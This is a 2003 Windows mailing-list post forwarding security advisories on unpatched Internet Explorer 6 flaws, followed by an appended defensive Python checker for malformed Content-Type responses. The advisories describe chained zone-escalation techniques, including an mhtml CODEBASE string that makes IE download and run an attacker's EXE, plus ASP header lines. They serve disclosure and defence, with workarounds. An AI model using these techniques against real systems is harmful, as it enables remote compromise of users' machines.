Awesome, job security

> -----Original Message-----
> From: Daniel Ensor [SMTP:densor@xxxxxxxxx]
> Sent: Wednesday, November 26, 2003 8:35 AM
> To: 'windows2000@xxxxxxxxxxxxx'
> Subject: [windows2000] FYI: Multiple vulnerabilities in Internet Explorer
>
> Hi List
>
> Just got this in:
>
> Cheers
>
> Dan
> --------------------------------------------------------------------
> Integralis S3 Advise .. Integralis S3 Advise .. Integralis S3 Advise
> --------------------------------------------------------------------
>
> Affected platforms: IE 6.0 with XP SP1 and MS03-048.
> Scope for attack:   Remote via hostile web page / e-mail.
> Effect:             Various up to and including remote
>                     code execution leading to compromise of
>                     the user's machine.
> Resolution:         Disable "Active Scripting" in the
>                     INTERNET zone.
>
> A whole slew of vulnerabilities in Internet Explorer have been released by
> prominent IE researcher Liu Die Yu. These affect IE 6 with all the latest
> patches applied. In other words, there are no patches available for any of
> these problems. This presents a "vulnerability window" in which many
> desktops will remain vulnerable unless remedial action is taken
> immediately.
>
>
> Pete Philips
> pete@xxxxxxxxxxxxxxxxxxx
>
> -----------------------------------------------------------------
> Integralis S3 Advise service
>
> The following message is reposted complete from the original source. It
> has not been modified by Integralis S3 in any way.
> -----------------------------------------------------------------
>
> New "Clean" IE Remote Compromise
>
> [tested]
> OS:Win2k3,CN version
> IE: with MS03-048 installed.
>
> OS:WinXp, CN version
> Microsoft Internet Explorer v6.Sp1; up-to-date on 2003/11/16
>
> [overview]
> By combining several vulnerabilities in Internet Explorer, an attacker can
> execute his EXE file on the victim's system.
> ("Clean" means: there is no old published vulnerability involved in this
> exploit)
>
> [demo]
> There is a harmless demo:
> http://www.safecenter.net/UMBRELLAWEBV4/1stCleanRc/1stCleanRc-Demo/index.html
> (runs harmless demonstration executable)
>
> [technical details]
> First, use MhtRedirParsesLocalFile to parse a local file in an IFRAME,
> (Liu Die Yu's http://www.safecenter.net/UMBRELLAWEBV4/MhtRedirParsesLocalFile)
> Then, use BackToFramedJpu to reach MYCOMPUTER zone.
> (Liu Die Yu's http://www.safecenter.net/UMBRELLAWEBV4/BackToFramedJpu)
> At last, in MYCOMPUTER security zone, use MhtRedirLaunchInetExe to
> download the payload EXE file and execute it. (Liu Die Yu's
> http://www.safecenter.net/UMBRELLAWEBV4/MhtRedirLaunchInetExe)
>
> [Workaround]
> Disable Active Scripting in INTERNET zone.
>
> [Greetings]
> greetings to:
> Drew Copley, dror, guninski and mkill.
>
> -----
> all mentioned resources can always be found at UMBRELLA.MX.TC
>
> [people]
> LiuDieyuinchina [N0-@-Sp2m] yahoo.com.cn
> UMBRELLA.MX.TC ==> How to contact "Liu Die Yu"
>
> [message]
> A wise man learns from other's mistakes; a fool learns from his own.
>
> [Employment]
> I would like to work professionally as a security researcher/bug finder.
>
> See my resume at my site. I am very eager to work, flexible, and extremely
> productive. I have a top notch resume, with credentials from leading bug
> finders. I am willing to work per contract, relocate, or telecommute.
>
> [Give a Hand]
> I haven't got a job as a security researcher yet and my family doesn't
> support my security work - so, I don't have a computer of my own. Please
> consider donating at: http://clik.to/donatepc
>
>
> -----------------------------------------------------------------
> Integralis S3 Advise service
>
> The following message is reposted complete from the original source. It
> has not been modified by Integralis S3 in any way.
> -----------------------------------------------------------------
>
> MHTML Redirection Leads to Downloading EXE and Executing
>
> [tested]
> OS:Win2k3,CN version
> IE: with MS03-048 installed.
>
> OS:WinXp, CN version
> Microsoft Internet Explorer v6.Sp1; up-to-date on 2003/11/16
>
> [overview]
> A vulnerability in Internet Explorer is found: any attacker that can reach
> MYCOMPUTER security zone (a.k.a local zone) is able to download his EXE
> file and execute it.
>
> [demo]
> There is a harmless demo:
> http://www.safecenter.net/UMBRELLAWEBV4/MhtRedirLaunchInetExe/MhtRedirLaunchInetExe-Demo.zip
>
> [technical details]
> There is a feature in Internet Explorer when it tries to retrieve a file
> embedded in an MHT file, like:
> mhtml:[Mhtml_File_Url]![Original_Resource_Url]
> If [Original_Resource_Url] cannot be retrieved from [Mhtml_File_Url], IE
> will try to download [Original_Resource_Url] and return the downloaded
> content.
>
> It's like HTTP redirection.
>
> And CODEBASE execution is a URL-based security check.
> (Liu Die Yu's http://continue.to/trie )
>
> So, in MYCOMPUTER security zone, point the CODEBASE property of an OBJECT
> tag with an unused CLSID to:
> mhtml:file:///C:\No_SUCH_MHT.MHT![Attaker_PayloadEXE_Url]
> and then, IE will download [Attaker_PayloadEXE_Url] and execute it.
>
> [Workaround]
> Disable Active Scripting in INTERNET zone.
>
> [Greetings]
> greetings to:
> Drew Copley, dror, guninski and mkill.
>
>
> -----------------------------------------------------------------
> Integralis S3 Advise service
>
> The following message is reposted complete from the original source. It
> has not been modified by Integralis S3 in any way.
> -----------------------------------------------------------------
>
> BackToFramedJpu - a successor of BackToJpu attack
>
> [tested]
> OS:Win2k3,CN version
> IE: with MS03-048 installed.
>
> OS:WinXp, CN version
> Microsoft Internet Explorer v6.Sp1; up-to-date on 2003/11/16
>
> [overview]
> A cross-zone scripting vulnerability has been found in Internet Explorer.
> If a webpage contains some subframe (either FRAME tag or IFRAME tag), its
> security zone may be compromised.
>
> [demo]
> There is a harmless demo:
> http://www.safecenter.net/UMBRELLAWEBV4/BackToFramedJpu/BackToFramedJpu-MyPage.htm
>
> [technical details]
> After applying the MS03-048 patch, javascript-protocol URLs are no longer
> stored in the URL history list, which means the classical
> "javascript-protocol URL in history" attack doesn't work any more.
> (Liu Die Yu's http://www.safecenter.net/UMBRELLAWEBV4/BackMyParent2/index.html)
>
> However, if an attacker does the following things:
> Navigate a sub-frame in victim document to a javascript-protocol URL,
> (first, navigate sub-frame to attacker's page, and then navigate the
> sub-frame to a javascript-protocol URL)
> and then navigate the top window away,
> At last, navigate back ("history.back()").
>
> the javascript-protocol URL will be loaded by the top window (victim
> document) and script in the javascript-protocol URL will be executed in
> the security zone of victim document - a.k.a cross-site/zone/domain
> scripting
>
> [Workaround]
> Disable Active Scripting in INTERNET zone.
>
> [Greetings]
> greetings to:
> Drew Copley, dror, guninski and mkill.
>
>
> -----------------------------------------------------------------
> Integralis S3 Advise service
>
> The following message is reposted complete from the original source. It
> has not been modified by Integralis S3 in any way.
> -----------------------------------------------------------------
>
> HijackClickV2 - a successor of HijackClick attack
>
> [tested]
> OS:Win2k3,CN version
> IE: with MS03-048 installed.
>
> OS:WinXp, CN version
> Microsoft Internet Explorer v6.Sp1; up-to-date on 2003/11/16
>
> [overview]
> After applying MS03-048, the original HijackClick exploit doesn't work any
> more. With method caching (a.k.a "SaveRef"), HijackClick works again.
>
> [demo]
> There is a harmless demo:
> http://www.safecenter.net/UMBRELLAWEBV4/HijackClickV2/HijackClickV2-MyPage.htm
>
> [technical details]
> After applying MS03-048, the original HijackClick exploit doesn't work any
> more. (Liu Die Yu's
> http://www.safecenter.net/UMBRELLAWEBV4/HijackClick/HijackClick-MyPage.HTM)
>
> Because window.moveBy is inaccessible. Method caching attack can make
> window.moveBy accessible again.
>
> [Workaround]
> Disable Active Scripting in INTERNET zone.
>
> [Greetings]
> greetings to:
> Drew Copley, dror, guninski and mkill.
>
>
> -----------------------------------------------------------------
> Integralis S3 Advise service
>
> The following message is reposted complete from the original source. It
> has not been modified by Integralis S3 in any way.
> -----------------------------------------------------------------
>
> Invalid ContentType may disclose cache directory
>
> [tested]
> OS:WinXp, CN version
> Microsoft Internet Explorer v6.Sp1; up-to-date on 2003/11/16
>
> [overview]
> The problem lies in the download function of Internet Explorer.
> This can be exploited by malicious web pages to get the cache directory,
> including random names.
>
> [demo]
> There are two harmless demos:
> 1st, online demo, powered by ASP:
> http://www.safecenter.net/UMBRELLAWEBV4/threadid10008/threadid10008-Demo
> 2nd, demo in ZIP format, powered by NETCAT:
> http://www.safecenter.net/UMBRELLAWEBV4/threadid10008/threadid10008-Demo.zip
>
> [technical details]
> When CONTENTTYPE in HTTP response is invalid and file extension is "HTM",
> the downloaded HTM file will be opened in cache directory, in INTERNET
> security zone.
>
> In the 1st demo, this is done by the following ASP code:
> ----------
> response.ContentType = "whocares"
> response.AddHeader "content-disposition", "inline; filename=test.htm"
> ----------
>
> In the 2nd demo, this is done with the help of NETCAT.
>
> [Workaround]
> Disable Active Scripting in INTERNET zone, so HTML page opened in the
> cache can't send information back to the attacker.
>
> Note for "Invalid ContentType may disclose cache directory"
>
> This vulnerability ("Invalid ContentType may disclose cache directory")
> doesn't work on all systems. ("Invalid ContentType may disclose cache
> directory", at
> http://www.safecenter.net/UMBRELLAWEBV4/threadid10008/)
> Please note that execdror6 and LocalZoneInCache also depend on this
> vulnerability.
> (execdror6: http://www.safecenter.net/UMBRELLAWEBV4/execdror6/
> LocalZoneInCache:
> http://www.safecenter.net/UMBRELLAWEBV4/LocalZoneInCache/)
> I have spent extraordinary time on this issue and here is all I know
> about it:
>
> First, the code was verified to work on a WinXp system (Simplified Chinese
> version) with all patches. Then, I sent LocalZoneInCache to HTTP-EQUIV,
> Dror Shalev and the Pull for testing: It works on Dror Shalev's WinXp
> machine (up-to-date) but it doesn't work on the Pull's Win2k system
> (because he set killbit for Adodb.Stream activeX object.)
> Soon after that,
> HTTP-EQUIV found it does not work on his WinXp system (2-3 weeks old, with
> the latest IE patch). Then, to figure out what happened, I formatted disk
> and installed Win2k3 and WinXp (both Simplified Chinese version) and then
> applied the latest IE patch. Both remote compromise cases (LocalZoneInCache
> and execdror6) don't work any more. At last, I reproduced both remote
> compromise cases on MSIEv6 running on Simplified Chinese WinXp with the
> following patches: SP1;Q828750;Q330994;Q824145 (a.k.a MS03-048)
>
> If you are using IE, please help me test it and send the result directly
> to my emailbox. Thanx in advance.
>
> [Greetings]
> greetings to:
> Drew Copley, dror, guninski and mkill.
>
>
> -----------------------------------------------------------------
> Integralis S3 Advise service
>
> The following message is reposted complete from the original source. It
> has not been modified by Integralis S3 in any way.
> -----------------------------------------------------------------
>
> Cache Disclosure Leads to MYCOMPUTER Zone and Remote Compromise
>
> [tested]
> OS:WinXp, CN version
> Microsoft Internet Explorer v6.Sp1; up-to-date on 2003/11/16
>
> [overview]
> By combining cache file disclosure and several other unpatched
> vulnerabilities, a malicious INTERNET page can reach MYCOMPUTER zone. The
> demo uses Adodb.Stream to launch a remote compromise attack.
>
> [demo]
> There are two harmless demos:
> Online demo, powered by ASP:
> http://www.safecenter.net/UMBRELLAWEBV4/LocalZoneInCache/LocalZoneInCache-Demo/index.html
> (runs harmless demonstration executable)
>
> [technical details]
> First, place an HTML file in IE cache directory and get its location. (Liu
> Die Yu's http://www.safecenter.net/UMBRELLAWEBV4/threadid10008/index.html)
> Second, this HTML file can be parsed as an HTML page and treated as in
> MYCOMPUTER security zone. (Mindwarper of mlsecurity.com's
> http://www.mlsecurity.com/ie/ie.htm)
> (Liu Die Yu's
> http://www.safecenter.net/UMBRELLAWEBV4/DblSlashForCache/DblSlashForCache-Content.htm)
> At last, overwrite NOTEPAD.EXE and make IE launch it by opening a
> view-source protocol URL: (HTTP-EQUIV of MALWARE's
> http://www.securityfocus.com/archive/1/343521)
>
> [Workaround]
> Disable Active Scripting in INTERNET zone, so HTML page opened in the
> cache can't send information back to the attacker.
>
> [Greetings]
> greetings to:
> Drew Copley, dror, guninski, vadim and mkill.
>
>
> -----------------------------------------------------------------
> Integralis S3 Advise service
>
> The following message is reposted complete from the original source. It
> has not been modified by Integralis S3 in any way.
> -----------------------------------------------------------------
>
> IE Remote Compromise by Getting Cache Location
>
> [tested]
> OS:WinXp, CN version
> Microsoft Internet Explorer v6.Sp1; up-to-date on 2003/11/16
>
> [overview]
> With the help of LocalZoneInCache (refer to "[technical details]" part), an
> attacker can compromise a user's system even though the user has: 1.
> Customized IE cache directory, 2. Applied MS03-048 patch, 3. Set killbit
> for ADODB.STREAM ActiveX.
>
> [demo]
> online demo, powered by ASP:
> http://www.safecenter.net/UMBRELLAWEBV4/execdror6/execdror6-Demo/index.html
> (runs harmless demonstration executable)
>
> [technical details]
> execdror6 is derived from execdror5.
> (Liu Die Yu's http://www.safecenter.net/UMBRELLAWEBV4/execdror5/)
> execdror6 differs from execdror5 in that:
> 1st, execdror6 uses LocalZoneInCache to reach MYCOMPUTER security zone.
> (Liu Die Yu's
> http://www.safecenter.net/UMBRELLAWEBV4/LocalZoneInCache/index.html)
> 2nd, execdror6 gets IE cache directory directly from location.href.
> (LocalZoneInCache makes the attacker's HTML page opened in cache directory.)
>
> [Workaround]
> Disable Active Scripting in INTERNET zone, so HTML page opened in the
> cache can't send information back to the attacker.
>
> [Greetings]
> greetings to:
> Drew Copley, dror, guninski, vadim and mkill.
>
>
> ------------------------------------------------------------------------
> The information you receive/contained herein is to keep you aware of
> developments in IT security that have general relevance to your IT systems
> environment. Our objective is to provide information to you as rapidly as
> possible to alert you to security threats, issues and potential solutions.
> In view of the expediency of the information the solutions described will
> not necessarily have been fully tested as to their applicability to your
> particular environment. Hence you use this information at your sole risk
> and liability. All trademarks are acknowledged as belonging to their
> respective owners.
>
> Visit the new FDL web-site designed to serve you better -
> http://www.fdl.co.uk
>
>
> This message has been sent from Fuerst Day Lawson Ltd and confirms that
> the email has been scanned and to the best of our knowledge is free from
> virus infection. The unauthorised use, disclosure, forwarding or copying
> of this message and any attachments is strictly prohibited.
> If you have received this message in error, please email
> moderator@xxxxxxxxx This message and any attachments, which are
> confidential and may be privileged, are for the use of the addressee(s)
> only. The views and opinions expressed in this email message are the
> author's own and may not reflect the views and opinions of Fuerst Day
> Lawson Ltd.
> ********************************************************
> This Weeks Sponsor SeamlessPlanet.com
> Register your domain name for as low as $7.75 per year!
> Cheaper than Godaddy..same great service!
> http://SeamlessPlanet.com
> ********************************************************
> To Unsubscribe, set digest or vacation
> mode or view archives use the below link.
>
> http://thethin.net/win2000list.cfm
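As an added, defender-side example that is not part of the original post or of the reposted advisories: the "Invalid ContentType may disclose cache directory" item above describes a response whose Content-Type is not a real media type but which is served inline with an .htm filename. The Python below (written for this page; function names and the sample responses are constructed, not captured traffic) parses a raw HTTP response header block and flags that combination, so a proxy or log pipeline can surface it while leaving ordinary inline HTML alone.

```python
import re
from typing import Dict, Optional

# A syntactically valid media type is "type/subtype"; the advisory's ASP demo
# sends "whocares", which has no slash at all.
MEDIA_TYPE_RE = re.compile(r"^[A-Za-z0-9!#$&^_.+-]+/[A-Za-z0-9!#$&^_.+-]+$")
FILENAME_RE = re.compile(r'filename\s*=\s*"?([^";]+)"?', re.IGNORECASE)
HTML_EXTS = (".htm", ".html", ".mht", ".mhtml")


def parse_headers(raw: str) -> Dict[str, str]:
    """Return the header block of a raw HTTP response as a lower-cased dict."""
    headers: Dict[str, str] = {}
    lines = raw.replace("\r\n", "\n").split("\n")
    for line in lines[1:]:              # lines[0] is the status line
        if not line.strip():
            break                       # blank line ends the header block
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return headers


def suspicious_inline_html(raw: str) -> Optional[str]:
    """Return a reason string when the response matches the pattern from the
    advisory (malformed Content-Type + inline .htm), otherwise None."""
    h = parse_headers(raw)
    ctype = h.get("content-type", "").split(";", 1)[0].strip()
    disp = h.get("content-disposition", "")
    if not disp.lower().startswith("inline"):
        return None                     # attachments are handed to the download dialog
    m = FILENAME_RE.search(disp)
    if not m:
        return None
    fname = m.group(1).strip()
    if not fname.lower().endswith(HTML_EXTS):
        return None
    if MEDIA_TYPE_RE.match(ctype):
        return None                     # well-formed Content-Type: ordinary inline HTML
    return (f"Content-Type {ctype!r} is not a valid media type but the response "
            f"is served inline as {fname!r}")


# Constructed sample responses (not captured traffic).
BAD_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: whocares\r\n"
    "Content-Disposition: inline; filename=test.htm\r\n"
    "\r\n"
    "<html><body>...</body></html>"
)
GOOD_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: text/html\r\n"
    "Content-Disposition: inline; filename=test.htm\r\n"
    "\r\n"
    "<html><body>...</body></html>"
)

if __name__ == "__main__":
    for label, resp in (("bad", BAD_RESPONSE), ("good", GOOD_RESPONSE)):
        print(label, suspicious_inline_html(resp))
```

A missing Content-Type header is treated the same way as a malformed one, since in both cases the browser has no trustworthy type to go on.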